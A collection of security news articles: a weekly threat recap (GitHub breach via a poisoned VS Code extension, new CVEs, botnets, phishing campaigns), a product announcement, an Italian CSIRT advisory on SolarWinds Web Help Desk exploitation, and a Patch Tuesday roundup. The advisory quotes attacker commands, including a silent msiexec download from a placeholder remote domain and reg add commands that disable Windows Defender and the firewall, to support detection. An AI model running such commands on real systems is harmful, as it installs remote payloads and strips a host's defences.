Monday recap. Same mess, new week. A sketchy dev tool got people pwned, old bugs came back from the dead, and security products somehow needed protecting from themselves. A bunch of companies spent the week checking old boxes and forgotten servers they should've patched years ago. Good times. Phishing crews are getting smarter too - less obvious scam junk, more targeted stuff that actually looks real. Meanwhile, botnets are grabbing anything exposed to the internet like it's free candy. The Internet's still a dumpster fire. Let’s get into it. ⚡ Threat of the Week GitHub Breached via Nx Console VS Code Extension—GitHub officially confirmed that the breach of its internal repositories was the result of a compromise of an employee device involving a poisoned version of the Nx Console Microsoft Visual Studio Code (VS Code) extension. The attack is said to have allowed the threat actor, a cybercriminal group known as TeamPCP, to exfiltrate about 3,800 repositories. GitHub said it has taken steps to contain the incident and rotated critical secrets, adding it's continuing to monitor the situation for follow-on activity. The Nx team revealed that the extension, nrwl.angular-console, was breached after one of its developers' systems was hacked in the wake of the recent TanStack supply chain attack. Other companies that were impacted by the TanStack compromise include OpenAI, Mistral AI, and Grafana Labs. Grafana Labs was also the target of an extortion attempt, but the company said it refused to pay the hackers who had threatened to release the company's codebase. The incidents are just some examples of the long tail of downstream victims emerging from the Mini Shai-Hulud campaign. This, coupled with TeamPCP's public release of the Shai-Hulud code, marks a significant evolution in software supply chain threats, as it gives attackers a ready-made blueprint for fleshing out similar worms targeting open-source repositories and developer environments. 80% of Security Teams Know OAuth Security Is Urgent. Half Are Doing Nothing Manual OAuth reviews don’t scale, and the rapid adoption of AI agents is making it worse. Material’s OAuth Threat Remediation Agent continuously monitors every connection across your cloud workspace, classifies risk, and automatically kills malicious ones before they become incidents. Close the Gap Today ➝ 🔔 Top News Microsoft Took Down Fox Tempest—Microsoft has cracked down on Fox Tempest, a cyber threat actor that fueled Rhysida ransomware attacks and other infections involving Oyster, Lumma Stealer, and Vidar. The group operates upstream in the malware and ransomware supply chain, acting as an enabler and providing tools for other threat actors to carry out attacks. This included a fraudulent code-signing service that let cybercriminals deploy malware "through the front door" without being detected. While bad actors have been known to resell code-signing certificates for at least a decade, Fox Tempest's operation stood out because it provided a scalable service for extortion, phishing, SEO poisoning, or malware-laced advertising. 9-Year-Old Linux Kernel Flaw Enables Root Command Execution—A new vulnerability disclosed in the Linux kernel remained undetected for nine years. The vulnerability, tracked as CVE-2026-46333 (CVSS score: 5.5), is a case of improper privilege management that could permit an unprivileged local user to disclose sensitive files and execute arbitrary commands as root on default installations of several major distributions like Debian, Fedora, and Ubuntu. The issue was introduced in November 2016. Microsoft Warned of Two Actively Exploited Defender Vulnerabilities—Microsoft has disclosed that a privilege escalation and a denial-of-service flaw in Defender have come under active exploitation in the wild. While CVE-2026-41091 could allow an attacker to gain SYSTEM privileges, CVE-2026-45498 relates to a case of denial-of-service. Although Microsoft has not formally confirmed, the vulnerability descriptions for CVE-2026-41091 and CVE-2026-45498 overlap with those of RedSun and UnDefend, two Defender zero-days that were disclosed by Chaotic Eclipse (aka Nightmare-Eclipse) last month. Newly Disclosed Drupal Core Flaw Under Attack—A critical security flaw impacting Drupal Core has come under active exploitation within days of public disclosure. The vulnerability in question is CVE-2026-9082 (CVSS score: 6.5), an SQL injection vulnerability affecting all supported versions of Drupal Core. Drupal acknowledged that "exploit attempts are now being detected in the wild." Thales-owned Imperva said it has observed over 15,000 attack attempts targeting almost 6,000 individual sites across 65 countries. Claude Mythos AI Finds 10K High-Severity Flaws in Popular Software—Anthropic revealed that Project Glasswing has helped uncover more than 10,000 high- or critical-severity vulnerabilities across some of the most "systemically" important software across the world since the cybersecurity initiative went live last month. Of these vulnerabilities, 6,202 have been classified as high- or critical-severity flaws impacting more than 1,000 open-source projects. Subsequent analysis of these vulnerability candidates has identified that 1,726 are valid true positives. As many as 1,094 flaws are assessed to be either high- or critical-severity. In total, these efforts have led to 97 findings being patched upstream and 88 advisories being issued. Cisco Patched CVSS 10.0 Secure Workload Flaw—Cisco rolled out updates for a maximum-severity security flaw impacting Secure Workload that could allow an unauthenticated, remote attacker to access sensitive data. Tracked as CVE-2026-20223 (CVSS score: 10.0), the vulnerability arises from insufficient validation and authentication when accessing REST API endpoints. "An attacker could exploit this vulnerability if they are able to send a crafted API request to an affected endpoint," Cisco said. "A successful exploit could allow the attacker to read sensitive information and make configuration changes across tenant boundaries with the privileges of the Site Admin user." Microsoft Released Mitigations for YellowKey—Microsoft released a mitigation for a BitLocker bypass vulnerability named YellowKey following its public disclosure last week. The zero-day flaw, now tracked as CVE-2026-45585, carries a CVSS score of 6.8. It has been described as a BitLocker security feature bypass. The issue impacts Windows 11 version 26H1 for x64-based Systems, Windows 11 Version 24H2 for x64-based Systems, Windows 11 Version 25H2 for x64-based Systems, Windows Server 2025, and Windows Server 2025 (Server Core installation). Microsoft noted that successful exploitation could permit an attacker with physical access to sidestep the BitLocker Device Encryption feature on the system storage device and gain access to encrypted data. 🔥 Trending CVEs Bugs drop weekly, and the gap between a patch and an exploit is shrinking fast. These are the heavy hitters for the week: high-severity, widely used, or already being poked at in the wild. Check the list, patch what you have, and hit the ones marked urgent first — CVE-2026-48172 (LiteSpeed User-End cPanel Plugin), CVE-2026-34926 (Trend Micro Apex One), CVE-2026-20223 (Cisco Secure Workload), CVE-2026-41091, CVE-2026-45498, CVE-2026-45584 (Microsoft Defender), CVE-2026-46333 (Linux Kernel), CVE-2026-9082 (Drupal Core), CVE-2026-45585 (Microsoft Windows BitLocker), CVE-2026-2743 (SEPPMail), CVE-2026-7301, CVE-2026-7302, CVE-2026-7304 (SGLang), CVE-2026-29205 (cPanel), CVE-2026-8178 (Amazon Redshift JDBC driver), CVE-2026-8053 (MongoDB), CVE-2026-45829 aka ChromaToast (ChromaDB), CVE-2026-8153 (Universal Robots PolyScope 5), CVE-2026-3102 (ExifTool), CVE-2026-9110, CVE-2026-9111, from CVE-2026-8511 through CVE-2026-8522 (Google Chrome), CVE-2026-45434 (Apache OFBiz), CVE-2026-33000, CVE-2026-34908, CVE-2026-34909, CVE-2026-34910, CVE-2026-34911 (UniFi OS), CVE-2026-45401 (Open WebUI), CVE-2026-9256, CVE‑2026‑8711 (F5 NGINX Plus and NGINX Open Source), CVE-2026-20239 (Splunk Enterprise and Splunk Cloud Platform), CVE-2026-46376 (FreePBX), CVE‑2026‑6637 (PostgreSQL), and CVE-2026-35194 (Apache Flink). 🎥 Cybersecurity Webinars Learn How Attackers Use AI to Supercharge DDoS Efficiency (and How to Stop It) → Adversaries are weaponizing AI to exploit network blind spots, auto-generate evasion scripts, and bypass traditional defenses with surgical precision. This webinar bridges the gap between AI-driven exploitation and cloud resilience, offering data-driven insights into how attackers maximize DDoS success rates. Join us to move beyond theory, leverage AI for non-disruptive security testing (CTEM), and transition your team from reactive mitigation to automated, continuous resilience. Beyond the Zero-Day: Hunting for Threats That Don't Need an Exploit → Zero-day exploits are no longer the ultimate metric of cyber risk. Today, sophisticated adversaries bypass traditional defenses entirely by leveraging identity flaws, living-off-the-land techniques, and AI automation that don't rely on unpatched software. This session moves beyond the zero-day obsession to expose how attackers operationalize modern post-compromise tactics—and how security teams can pivot from reactive patching to proactive, behavioral threat hunting. 📰 Around the Cyber World Vulnerability Exploitation Overtakes Compromised Credentials in a Long Time —Vulnerability exploitation has overtaken compromised credentials for the first time in nearly two decades as the most common initial access vector for data breaches, per Verizon. Nearly a third (31%) of data breaches over the past year started with vulnerability exploitation, up from 20% in 2024. Credential abuse declined from 22% to 13%. What's more, only 26% of critical vulnerabilities listed in the U.S. Cybersecurity Infrastructure and Security Agency Known Exploited Vulnerabilities (KEV) catalog were fully remediated by organizations in 2025, a drop from 38% the previous year. "The median time for full resolution went up to 43 days, almost two weeks more than the previous year’s 32 days," the report said. "In the median case, organizations had 50% more critical vulnerabilities to patch in this year’s reporting dataset compared to the previous year." Ransomware accounted for 48% of all breaches last year, up from 44% in 2024. But in a positive development, ransom payments have continued to decline, with the median payment sliding from $150,000 in 2024 to almost $140,000. Attackers Go After India's Education Ecosystem —Threat actors are abusing student data within India's education ecosystem, spanning educational institutions, third-party vendors, and online services, for phishing, impersonation, social engineering, and financially motivated fraud operations. "Attackers commonly leverage exposed or misused student information to create highly convincing scams related to admissions, scholarships, internships, fee payments, and academic services," CYFIRMA said. "In several instances, threat actors exploited trusted educational branding, fraudulent portals, and insider access to obtain credentials, financial information, or direct payments. Additionally, some cases indicated the misuse of student-linked bank accounts within broader fraud and mule account operations." RondoDox Adds ASUS Router Flaw to its Arsenal —The operators of the RondoDox botnet have incorporated CVE-2018-5999 (CVSS score: 9.8), a critical ASUS router flaw, to their arsenal, marking the first observation of in-the-wild exploitation of the vulnerability. The activity was first detected on May 17, 2026, against its honeypots. "The attack pattern: payloads that set the ateCommand_flag to 1, enabling the infosvr interface to accept arbitrary configuration changes," VulnCheck CTO Jacob Baines said in a post on LinkedIn. Fake Microsoft Teams Sites Deliver ValleyRAT —Fake Microsoft Teams distribution sites shared on X are being used to trick unsuspecting users into downloading a trojanized installer packaged as a ZIP archive, ultimately leading to the deployment of ValleyRAT, a malware associated with a Chinese cybercrime group called Silver Fox. "The delivered payload leverages a DLL sideloading chain via a legitimate executable (GameBox.exe) developed by Tencent, ultimately deploying a ValleyRAT variant," K7 Labs said. "This malware campaign stands out for its clean execution chain, combining social engineering with staged payload delivery, in-memory decryption, and stealthy persistence mechanisms." Malicious Activity Targeting Malaysian Entities —An attacker-controlled infrastructure hosted on Microsoft Azure infrastructure in the Malaysia West region has been used to conduct a targeted intrusion campaign against multiple Malaysian organizations, per Oasis Security. "The operation demonstrates a high degree of operational planning, with the attacker developing purpose-built Python tooling for each target — covering internal network enumeration, database access, and external data exfiltration," the company said. The infrastructure hosts target-specific Python scripts, webshell deployment tools, a Laravel remote code execution exploit chain, and source code for custom command-and-control (C2) components. Texas Attorney General Sues Meta Over WhatsApp Encryption Claims —The Texas Attorney General has sued Meta over allegations that the company's WhatsApp messenger doesn't provide the end-to-end encryption (E2EE) it has long claimed. "Reports suggest that employees of WhatsApp have been able to access user communications," the Office of the Texas Attorney General said. "Additional reporting and investigations indicate that message content can be pulled and viewed after the message has been sent. This is a complete and total misrepresentation of Meta’s privacy policies." The lawsuit hinges on a report from Bloomberg from last month about how the U.S. Commerce Department's Bureau of Industry and Security had abruptly closed an investigation into allegations that Meta could access encrypted WhatsApp messages. Preliminary findings from the department claimed that "there is no limit to the type of WhatsApp message that can be viewed by Meta." Meta has called the allegations "baseless." FIOD Arrests Two in Connection with Stark Industries —The Netherlands Fiscal Intelligence and Investigation Service (FIOD) arrested two men and seized 800 servers in connection with a web hosting company that enabled cyber attacks, interference operations, and disinformation campaigns. The arrested individuals included a 57-year-old man from Amsterdam and a 39-year-old man from The Hague. Although the name of the company was not explicitly mentioned, it is assessed to be Stark Industries, which was sanctioned by the E.U. in May 2025. Following the sanctions, a significant chunk of the technical infrastructure was transferred to a Dutch-based entity known as THE.Hosting aka WorkTitans. "This new company actually acts as a cover for the sanctioned entities," FIOD said. "The director and (indirect) sole shareholder of this company is the 57-year-old suspect." A second unnamed Dutch company is said to have played a facilitating role. "This company, of which the 39-year-old is a suspected director and sole shareholder, ensures that the servers of the former new company are connected to the internet," FIOD added. UNG0002 Targets Chinese Educational Sector —The Chinese educational sector has become the target of a new campaign conducted by UNG0002 as part of a spear-phishing campaign codenamed Operation Dragon Whistle. "What makes this campaign particularly effective is the precision of its social engineering," Seqrite Labs said. "The threat actor did not use a generic lure — they specifically identified that Changzhou University conducts mandatory annual fitness assessments where failure directly impacts graduation eligibility. This creates an environment of urgency and compliance that significantly increases the probability of victim engagement." The emails have been found to distribute ZIP archives that ultimately lead to the deployment of Cobalt Strike Beacon. Void Botnet Uses Ethereum Smart Contracts for C2 —A new botnet malware called Void Botnet uses Ethereum smart contracts for seizure-resistant command-and-control (C2). It's a Rust-based malware that's advertised on cybercrime forums by a developer operating under the handle TheVoidStl. "Based on the seller's documentation and panel screenshots, Void Botnet is a Rust-native loader with two command-and-control modes in the same binary," Qrator Labs said. "The first mode routes commands through Ethereum smart contracts: the operator writes instructions to a contract, and infected machines check it at regular intervals, picking up new tasks within three to five minutes. The second mode connects machines directly to the operator's web panel, with tasks completing in under thirty seconds. The operator switches between them at any time by updating the contract." The botnet works by writing commands to smart contracts, bots polling public RPC endpoints, and C2 infrastructure that is hard to take down. Proton Debuts AI Access Tokens in Proton Pass —Proton Pass, a secure, end-to-end encrypted (E2EE) password manager, has added credential sharing through AI access tokens, allowing users to give AI agents access to items it's permissioned to and monitor their activity. "AI access tokens are our newest secure sharing option to bring password management into the age of agentic AI," Proton said. "Every time an AI agent uses an access token, this is logged, and a reason for the access must be provided. For extra security, you can also set an expiration for each token, from one hour to one year, after which it can no longer be used." DevilNFC and NFCMultiPay Android NFC Relay Malware Spotted —Two new Android NFC relay malware families named DevilNFC and NFCMultiPay have been observed targeting European and LATAM banking customers. "These two NFC relay toolkits are being developed and operated outside the Chinese-speaking MaaS ecosystem: DevilNFC carries an exclusively Spanish-speaking attribution, while NFCMultiPay's developer fingerprint is Portuguese (Brazilian)," Cleafy said. "Local groups are no longer buying access to Chinese platforms; they are building their own." It's assessed that the malware families may have been developed with assistance using generative artificial intelligence (AI). Both malware families are designed to collect the victim's card PIN. "DevilNFC further locks the victim inside the malicious interface via Kiosk Mode, preventing any escape while the relay completes," the Italian company said. "DevilNFC employs an asymmetric architecture in which a single APK serves both roles in a relay attack: a passive reader on the victim's device and a system-level card emulator on the attacker's rooted device, achieved via a hooking framework that intercepts NFC traffic below the Android API layer." DevilNFC overlaps with an NGate variant documented by ESET last month. The malicious apps are distributed via SMS or WhatsApp messages, directing victims to fake landing pages impersonating Google Play Store listings. TAX#TRIDENT Uses Indian Income Tax Lures —A new campaign dubbed TAX#TRIDENT is using Indian Income Tax-themed lures to target Windows endpoints via three delivery paths. The campaign starts with fake tax assessment lures and then moves victims toward ZIP files, VBScript downloaders, or PHP-looking web endpoints that actually return script content," Securonix said. "The first branch uses a ZIP file and a signed ClientSetup installer. Once executed, the installer creates a hidden client tree, adds service and driver persistence, and starts network communication. The second branch uses 'Assessment_Order.vbs.' The script shows a tax assessment decoy image, downloads the same ClientSetup payload, writes a new 'YTSysConfig.ini,' and runs the payload hidden. The third branch uses a PHP-looking endpoint that returns VBScript. That script downloads more stages from S3, disguises a VBS file as a PNG image, changes UAC prompt behavior, and silently installs a signed ManageEngine UEMS / Endpoint Central agent." CISA Launches KEV Nomination Form to Report Exploited Bugs —The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has introduced an online Nomination Form that lets researchers, vendors, and industry partners submit known exploited vulnerabilities (KEVs) directly so as to "quickly identify, validate, and share KEVs, critical threat information." Exploitation of Four-Faith Router Flaw —Attackers are exploiting CVE-2024-9643 (CVSS score: 9.8), a critical authentication bypass flaw in Four-Faith F3x36 industrial cellular routers, as part of a large-scale campaign since mid-May 2026 to turn fold compromised devices into botnets for further campaigns. CrowdSec said it has observed 139 attacking IP addresses through May 18, 2026. "Exploitation was first observed on April 20 and escalated to the point of being reclassified as mass exploitation on May 12, a strong signal that attackers are operationalizing this flaw at scale," it added. Chinese-Language PhaaS Ecosystem Detailed —An analysis of a dozen current phishing-as-a-service (PhaaS) offerings in the Chinese underground has found that they have shifted away from static password harvesting towards real-time interception and tokenization via live administration panels, allowing attackers to capture one-time passcodes (OTPs) and bypass multifactor authentication (MFA) instantly. The services, such as YY Lai Yu, primarily target non-Chinese entities, with advertisements regularly posted to Telegram rather than channels such as WeChat (Weixin) or Tencent QQ. A crucial aspect of these operations is their exploitation of digital wallet provisioning to monetize stolen payment details. Attackers have been found to leverage captured credentials and OTPs to provision the victim's card into a digital wallet on an attacker-controlled device. Once tokenized, the card can be used for high-value transactions, contactless payments, and ATM withdrawals. "Instead of simply gaining account access, these operations focus on exploiting digital wallet provisioning to transform stolen payment data into tokenized assets within ecosystems," Google said. "This shift—combined with the use of encrypted delivery channels like RCS and iMessage to bypass traditional carrier security filters on SMS messages—represents an emerging development where the goal is no longer just a login, but securing direct, unauthorized control over a victim's financial accounts." 🔧 Cybersecurity Tools Bumblebee → It is an open-source security tool for macOS and Linux designed to find software supply-chain vulnerabilities on developer computers. It acts as a lightweight, read-only scanner that audits metadata files, manifests, and configurations rather than executing code. This allows it to safely check local language packages, web browser extensions, text editor add-ons, and AI tool configurations for known security exposures without running potentially malicious install scripts. Claude-BugHunter → It is an open-source add-on that configures Anthropic’s Claude Code command-line tool into a specialized security assistant. It equips the AI with pre-built vulnerability patterns, attack techniques, and reporting templates, automating the process of finding and documenting security flaws during authorized testing. Disclaimer: This is strictly for research and learning. It hasn't been through a formal security audit, so don't just blindly drop it into production. Read the code, break it in a sandbox first, and make sure whatever you’re doing stays on the right side of the law. Conclusion Patch the easy stuff before it becomes a bigger problem next week. The old bugs everyone ignored? Attackers didn’t ignore them. They never do. Right now, the internet feels held together with tape and luck. Every week, there’s a new mess, a new scam, or some old box getting dragged into a botnet. See you next Monday.
thehackernews.comMay 25, 2026extracted
ManageEngine adds causal and autonomous AI to Site24x7 to cut MTTR
ManageEngine adds causal and autonomous AI to Site24x7 to cut MTTR ManageEngine has added new causal intelligence and autonomous AI capabilities in Site24x7, its full-stack observability platform. These enhancements transform how enterprises handle outages, shifting from firefighting to autonomous resilience. By reducing mean time to recovery (MTTR) and ensuring service-level agreement (SLA) compliance, Site24x7 helps IT teams safeguard the customer experience and retain trust. IT environments are increasingly fragmented across hybrid clouds, microservices, and dynamic networks, generating massive volumes of telemetry and predictive anomaly signals every second. When an incident occurs, this complexity turns troubleshooting into a needle-in-a-haystack search, often leading to prolonged downtime. IT teams struggle to correlate anomaly signals and events across these layers, delaying the critical fix to restore normalcy, jeopardizing brand reputation. “Hybrid and cloud-native architectures have made IT operations highly interconnected, while IT managers are under constant pressure to resolve incidents quickly amid growing complexity,” said Srinivasa Raghavan, director of product management at ManageEngine. “By combining predictive anomaly detection, intelligent event correlation, service dependency context, and AI-driven causal insights, Site24x7 cuts through alert noise to show not just what is broken, but what caused it and what it impacts, helping teams identify the true fault faster and significantly reduce MTTR while minimizing service disruption.” “Triaging and resolving incidents in hybrid environments with growing infrastructure complexity can quickly become a nightmare, especially when SLA commitments are on the line,” said Pravir Kumar Sinha, IT leader at Synechron, a global IT services company and one of the early customers to access the feature. “With Site24x7 AIOps, we’re able to filter out nearly 90% of alert noise, pinpoint issues faster, and accelerate resolution. This helps us achieve stronger SLA adherence, reduce MTTR, and ultimately deliver reliable digital experience for customers.” The introduction of autonomous AI in Site24x7 represent a practical step toward more autonomous IT operations by analyzing observability data, reducing cognitive overload, and turning insights into clear, actionable guidance. “With MCP providing the control and governance layer, we ensure this intelligence is applied securely and within enterprise guardrails. This empowers IT leaders move toward agentic workflows with confidence, stay ahead of the AI adoption curve, and strengthen the resilience of their critical digital services,” said Raghavan. Key capabilities include: Domain-aware causal correlation with predictive anomaly detection: Detects anomalies and correlates related signals across applications, infrastructure, and networks into a single, context-rich problem, so teams can understand what is connected and where to start. Customizable AI agents with governed, task-driven automation: Enables customers to create and tailor AI agents, set approved guardrails using solution documents, and assign tasks that guide agents from analysis to guided action—making response workflows more consistent across teams. MCP-enabled agentic foundation for customers: MCP provides the enabling layer for customers to build and operationalize agentic use cases on top of observability data—standardizing how agents access data, follow approved guidance, and execute tasks within enterprise-ready controls and auditability. Orchestrated remediation with Qntrl: Coordinates downstream actions through structured workflows and repeatable runbooks, powered by Zoho’s workflow and orchestration platform Qntrl, with approvals and traceability built in to support controlled automation.
helpnetsecurity.comFeb 17, 2026extracted
SolarWinds Web Help Desk: sfruttamento attivo di vulnerabilità
SolarWinds Web Help Desk: sfruttamento attivo di vulnerabilità Bollettino BL01/260212/CSIRT-ITA Sintesi Ricercatori di sicurezza di Huntress hanno recentemente analizzato attività di post exploitation derivanti dallo sfruttamento delle vulnerabilità CVE-2025-40551 e CVE-2025-26399, che interessano il prodotto SolarWinds Web Help Desk. Descrizione e potenziali impatti Ricercatori di sicurezza di Huntress hanno recentemente analizzato attività di post exploitation derivanti dallo sfruttamento delle vulnerabilità CVE-2025-40551 e CVE-2025-26399 – già trattate da questo CSIRT nell’ambito dell’AL06/260128/CSIRT-ITA e dell’AL03/250923/CSIRT-ITA – che interessano il prodotto SolarWinds Web Help Desk. Nel dettaglio la catena d’attacco ha visto il successivo utilizzo di tre applicativi volti a garantire la gestione remota dei dispositivi target: Zoho Meeting, Cloudfare tunnel e Velociraptor. Questi strumenti sono stati utilizzati per garantire l’accesso persistente e la possibilità di effettuare movimenti laterali all'interno delle reti compromesse. Di seguito si riportano maggiori dettagli in merito all’intera catena di compromissione. Analisi del vettore iniziale Il vettore di attacco iniziale consiste nella compromissione del modulo di gestione del Web Help Desk di SolarWinds. Le vulnerabilità, di tipo “Remote Code Execution”, interessano la classe AjaxProxy e sono dovute alla deserializzazione non corretta di dati non attendibili: l'invio di payload serializzati malevoli all'interno di richieste HTTP opportunamente predisposte, consente a un attaccante remoto e non autenticato di forzare l'esecuzione di codice arbitrario sul server target. Persistenza Dopo aver consolidato l'accesso iniziale, gli attaccanti utilizzano il processo java.exe (figlio del servizio WHD wrapper.exe) per istanziare una shell cmd.exe. Tramite questa, viene eseguito MSIEXEC.EXE per il download e l'installazione silenziosa dell'agente Zoho ManageEngine RMM da una risorsa remota. msiexec /q /i hxxps://[DOMINIO[.][TLD]/[FILE].msi L'abuso di questo strumento di amministrazione legittimo garantisce agli attaccanti: Canale C2 resiliente: mantenimento di una connessione cifrata persistente verso l'infrastruttura dell'attaccante, che si confonde con il normale traffico di gestione IT (traffic masquerading); Accesso di livello SYSTEM: esecuzione di script e/o comandi arbitrari con privilegi massimi ereditati dal servizio WHD, senza necessità di interazione utente o ulteriori autenticazioni; Evasione dei controlli: elusione delle policy di sicurezza basate sulla reputazione dei processi, dato che l'agente Zoho è un binario firmato e affidabile. Operativamente, l'impianto viene finalizzato configurando l'agente in modalità Unattended Access e vincolandolo al tenant gestito dall'attaccante, identificato tramite un account ProtonMail ([account]@proton[.]me) Tale configurazione disaccoppia l'infrastruttura di comando, permettendo al traffico C2 di mimetizzarsi interamente nelle comunicazioni legittime verso il cloud del vendor (Living-off-the-Services). Discovery Sfruttando il processo di esecuzione di Zoho - TOOLSIQ.EXE - gli attaccanti esplorano l’ambiente circostante l’host compromesso, tramite l’esecuzione di query Active Directory come: net group “domain computer” /do Collecting Sfruttando il canale Zoho stabilito, gli attaccanti distribuiscono il tool Velociraptor (v0.73.4) tramite installazione MSI silente. La scelta di questa specifica versione non è casuale: oltre a fungere da strumento di Deep System Reconnaissance (sfruttando le capacità native di interrogazione VQL a livello forense), essa è nota per vulnerabilità di tipo “Privilege Escalation”, offrendo vettori secondari (di backup) per mantenere il controllo dei sistemi e/o espandersi. Operativamente, l'impianto viene utilizzato per mappare l'infrastruttura ed eseguire payload PowerShell offuscati (Base64/UTF-16LE). Per garantire l'esfiltrazione dei dati e la ridondanza del C2, viene contestualmente installato il demone Cloudflare Tunnel (cloudflared), prelevato dal repository GitHub ufficiale. Quest’ultimo provvede ad incapsulare il traffico malevolo all'interno di un tunnel HTTPS apparentemente legittimo, rendendo l'attività non rilevabile dai meccanismi di sicurezza perimetrali tradizionali e ai sistemi di ispezione DPI. Exfiltration Sfruttando i canali creati precedentemente, gli attaccanti inoltrano le informazioni raccolte verso un'infrastruttura di Log Aggregation, ospitata su Google Cloud Platform (GCP). I flussi informativi vengono processati in istanze Elastic e centralizzati in una piattaforma SIEM: tale approccio strutturato consente di indicizzare e interrogare le evidenze raccolte con le stesse capacità analitiche di un SOC, ottimizzando la selezione dei target per le fasi successive. Defense Evation Dopo circa 100 secondi dall’accesso iniziale si osserva l'esecuzione automatizzata di una catena di comandi REG.EXE volta a disabilitare i controlli di sicurezza mediante la modifica delle voci di registro, tramite i seguenti comandi: reg add "HKLM\SYSTEM\CurrentControlSet\Services\mpssvc" /v Start /t REG_DWORD /d 4 /f reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOAVProtection /t REG_DWORD /d 1 /f reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealTimeMonitoring /t REG_DWORD /d 1 /f reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpynetReporting /t REG_DWORD /d 0 /f C2 L'architettura di Comando e Controllo implementa meccanismi avanzati di Survivability: l'impianto non si limita a verificare la raggiungibilità degli endpoint (Health Check), ma supporta l'aggiornamento della configurazione a caldo (Runtime Config Hot-Swapping). Tale capacità consente di variare le liste di domini e/o IP della C2 senza necessità di ridistribuire i binari malevoli. Tale flessibilità garantisce la rotazione dinamica dell'infrastruttura su scala globale, vanificando i tentativi difensivi di Sinkholing o blocco statico degli IP (IP Blacklisting), assicurando la persistenza del canale anche in caso di smantellamento parziale dei nodi C2. Azioni di mitigazione Gli utenti e le organizzazioni possono far fronte a questa tipologia di attacchi attivando le seguenti misure di mitigazione: aggiornare le istanze SolarWinds Web Help Desk alla versione 2026.1 o successiva, che risolve le vulnerabilità CVE-2025-26399, CVE-2025-40536 e CVE-2025-40551; non esporre le interfacce amministrative di WHD, che non devono essere accessibili direttamente sulla rete Internet. Proteggere tali interfacce tramite VPN o un firewall; reimpostare le password di tutti gli account di servizio, gli account amministrativi e di tutte le credenziali accessibili tramite l’applicazione WHD o memorizzate al suo interno. Inoltre, è possibile verificare un’eventuale compromissione tramite la verifica degli host WHD per individuare la presenza di: strumenti di accesso remoto non autorizzati (Zoho Assist, Velociraptor, Cloudflared, tunnel di VS Code) servizi anomali; esecuzioni di PowerShell codificate; installazioni MSI silenziose avviate dal processo del servizio WHD (java.exe/wrapper.exe). Infine, si raccomanda di valutare la verifica e l’implementazione degli IoC[1] forniti dai ricercatori di sicurezza tramite il bollettino riportato nella sezione Riferimenti. [1] Per definizione, non tutti gli indicatori di compromissione sono malevoli. Questo CSIRT non ha alcuna responsabilità per l'attuazione di eventuali azioni proattive (es. inserimento degli IoC in blocklist) relative agli indicatori forniti. Le informazioni contenute in questo documento rappresentano la migliore comprensione della minaccia al momento del rilascio. Criticità Medio (40.0) Data pubblicazione 12/02/26 ore 17:00 Data Ultimo Aggiornamento 27/02/26 ore 11:00
acn.gov.itFeb 12, 2026extracted
Over 60 Software Vendors Issue Security Fixes Across OS, Cloud, and Network Platforms
It's Patch Tuesday, which means a number of software vendors have released patches for various security vulnerabilities impacting their products and services. Microsoft issued fixes for 59 flaws, including six actively exploited zero-days in various Windows components that could be abused to bypass security features, escalate privileges, and trigger a denial-of-service (DoS) condition. Elsewhere, Adobe released updates for Audition, After Effects, InDesign Desktop, Substance 3D, Bridge, Lightroom Classic, and DNG SDK. The company said it's not aware of in-the-wild exploitation of any of the shortcomings. SAP shipped fixes for two critical-severity vulnerabilities, including a code injection bug in SAP CRM and SAP S/4HANA (CVE-2026-0488, CVSS score: 9.9) that an authenticated attacker could use to run an arbitrary SQL statement and lead to a full database compromise. The second critical vulnerability is a case of a missing authorization check in SAP NetWeaver Application Server ABAP and ABAP Platform (CVE-2026-0509, CVSS score: 9.6) that could permit an authenticated, low-privileged user to perform certain background Remote Function Calls without the required S_RFC authorization. "To patch the vulnerability, customers must implement a kernel update and set a profile parameter," Onapsis said. "Adjustments in user roles and UCON settings might be required to not interrupt business processes." Rounding off the list, Intel and Google said they teamed up to examine the security of Intel Trust Domain Extensions (TDX) 1.5, uncovering five vulnerabilities in the module (CVE-2025-32007, CVE-2025-27940, CVE-2025-30513, CVE-2025-27572, and CVE-2025-32467), and nearly three dozen weaknesses, bugs, and improvement suggestions. "Intel TDX 1.5 introduces new features and functionality that bring confidential computing significantly closer to feature parity with traditional virtualization solutions," Google said. "At the same time, these features have increased the complexity of a highly privileged software component in the TCB [Trusted Computing Base]." Software Patches from Other Vendors Security updates have also been released by other vendors in recent weeks to rectify several vulnerabilities, including — ABB Amazon Web Services AMD AMI Apple ASUS AutomationDirect AVEVA Broadcom (including VMware) Canon Check Point Cisco Citrix Commvault ConnectWise D-Link Dassault Systèmes Dell Devolutions dormakaba Drupal F5 Fortinet Foxit Software FUJIFILM Fujitsu Gigabyte GitLab Google Android and Pixel Google Chrome Google Cloud Grafana Hikvision Hitachi Energy HP HP Enterprise (including Aruba Networking and Juniper Networks) IBM Intel Ivanti Lenovo Linux distributions AlmaLinux, Alpine Linux, Amazon Linux, Arch Linux, Debian, Gentoo, Oracle Linux, Mageia, Red Hat, Rocky Linux, SUSE, and Ubuntu MediaTek Mitsubishi Electric MongoDB Moxa Mozilla Firefox and Thunderbird n8n NVIDIA Phoenix Contact QNAP Qualcomm Ricoh Rockwell Automation Samsung Schneider Electric ServiceNow Siemens SolarWinds Splunk Spring Framework Supermicro Synology TP-Link WatchGuard Zoho ManageEngine Zoom, and Zyxel
thehackernews.comFeb 11, 2026extracted
Hackers exploit SolarWinds WHD flaws to deploy DFIR tool in attacks
